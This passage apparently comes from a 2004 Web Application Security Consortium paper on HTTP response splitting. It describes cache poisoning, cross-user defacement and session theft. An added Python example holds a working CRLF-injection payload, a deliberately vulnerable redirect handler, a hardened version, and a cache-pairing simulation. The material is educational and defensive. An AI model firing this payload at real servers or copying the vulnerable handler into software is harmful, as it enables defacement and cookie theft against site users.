the clients use IE unless all the location headers can be
controlled. This attack makes it possible.
Web Cache Poisoning (defacement): This is a new attack. The
attacker simply forces the target (i.e. a cache server of some
sort; the attack was verified on Squid 2.4, NetCache 5.2,
Apache Proxy 2.0 and a few other cache servers) to cache the
second response as the response to the second request. An
example is to send a second request for
http://web.site/index.html and force the target (the cache server)
to cache, as the response to it, the second response, which is
fully controlled by the attacker. This is effectively a defacement
of the web site, at least as experienced by other clients who use
the same cache server. Of course, in addition to defacement, an
attacker can steal session cookies, or fix them to a predetermined value.
Cross User attacks (single user, single page, temporary
defacement): As a variant of the attack, it is possible for the
attacker not to send the second request at all. This seems odd at
first, but the idea is that in some cases the target shares the
same TCP connection to the server among several users (this is
the case with some cache servers). The next user to send a
request to the web server through the target will be served, by
the target, with the second response the attacker generated. The
net result is that a client of the web site is served with a
resource that was crafted by the attacker. This enables the
attacker to deface the site for a single page requested by a
single user (a local, temporary defacement). Much like the
previous item, in addition to defacement, the attacker can steal
session cookies and/or set them.
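The two items above (the attacker's own second request, and the victim's request on the shared connection) are the same mechanism seen from two sides, so one simulation covers both. The following is an added example, not code from the original paper: a hypothetical vulnerable redirect script (/redir_lang.jsp, its Location target by_lang.jsp and the Server header are assumed names), a parser that splits a byte stream into HTTP messages the way a simple proxy or cache does, and a pairing step that matches responses to requests in order on one connection. The payload is constructed for the example, and no network I/O takes place.

```python
import urllib.parse

# Attacker-supplied value for the "lang" parameter, URL-encoded as it would
# travel in the query string (constructed for this example).  Decoded, it ends
# the 302 early and starts a second, fully attacker-controlled 200 response.
PAYLOAD = (
    "foobar%0d%0aContent-Length:%200%0d%0a%0d%0a"
    "HTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a"
    "Content-Length:%2019%0d%0a%0d%0a%3Chtml%3EShazam%3C/html%3E"
)


def vulnerable_redirect(raw_lang: str) -> bytes:
    """Hypothetical /redir_lang.jsp: decodes the parameter and copies it into
    the Location header without rejecting CR/LF (the splitting bug)."""
    lang = urllib.parse.unquote(raw_lang)
    return (
        b"HTTP/1.1 302 Moved Temporarily\r\n"
        b"Location: http://web.site/by_lang.jsp?lang=" + lang.encode("latin-1") + b"\r\n"
        b"Server: hypothetical/1.0\r\n"
        b"Content-Length: 0\r\n"
        b"\r\n"
    )


def hardened_redirect(raw_lang: str) -> bytes:
    """Same redirect with the fix: reject CR/LF after decoding, and re-encode
    the value so only URL-safe characters ever reach the header."""
    lang = urllib.parse.unquote(raw_lang)
    if "\r" in lang or "\n" in lang:
        raise ValueError("CR/LF in header value rejected")
    safe = urllib.parse.quote(lang, safe="")
    return (
        b"HTTP/1.1 302 Moved Temporarily\r\n"
        b"Location: http://web.site/by_lang.jsp?lang=" + safe.encode("ascii") + b"\r\n"
        b"Server: hypothetical/1.0\r\n"
        b"Content-Length: 0\r\n"
        b"\r\n"
    )


def parse_response_stream(stream: bytes):
    """Split one byte stream into HTTP responses the way a simple proxy/cache
    does: status line and headers up to the first blank line, then
    Content-Length bytes of body.  Returns (responses, leftover bytes)."""
    responses = []
    pos = 0
    while True:
        while stream.startswith(b"\r\n", pos):      # skip blank lines between messages
            pos += 2
        if not stream.startswith(b"HTTP/", pos):    # not a status line: stop parsing
            break
        end = stream.find(b"\r\n\r\n", pos)
        if end == -1:
            break
        lines = stream[pos:end].split(b"\r\n")
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(b":")
            headers[name.strip().lower()] = value.strip()
        length = int(headers.get(b"content-length", b"0"))
        body_start = end + 4
        responses.append({"status": lines[0], "headers": headers,
                          "body": stream[body_start:body_start + length]})
        pos = body_start + length
    return responses, stream[pos:]


def pair_on_shared_connection(raw_lang: str, later_requests):
    """Simulate a cache that keeps one server connection open and matches
    responses to requests in order.  The first request is the attacker's
    redirect; later_requests are the paths that arrive next on the same
    connection (the attacker's own /index.html, or a victim's page).
    The origin emits exactly one message, but it parses as two."""
    requests = [b"/redir_lang.jsp?lang=" + raw_lang.encode("ascii")] + list(later_requests)
    stream = vulnerable_redirect(raw_lang)          # one response from the origin
    responses, junk = parse_response_stream(stream)
    paired = {path: resp for path, resp in zip(requests, responses)}
    return paired, junk
```

With PAYLOAD and a second request for /index.html, the pairing stores the injected "Shazam" page under /index.html (the cache poisoning case); with a victim's path as the second request instead, that victim receives the same page (the cross-user case). The origin's own trailing headers end up as leftover bytes that the parser does not treat as a message, which is why the attack needs a Content-Length on the injected response. A benign value yields a single response and nothing to pair with the second request, and the hardened handler rejects the payload outright.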
Hijacking pages with user-specific information: With this attack,
it is possible for the attacker to receive the server's response to
a user's request instead of the user. Therefore, the attacker gains
access to user-specific information that may be sensitive and
confidential.
Browser cache poisoning: This is a special case of Web Cache
Poisoning (verified on IE 6.0). It is somewhat similar to XSS in
the sense that in both the attacker needs to target individual
Copyright 2004, Web Application Security Consortium. All rights reserved.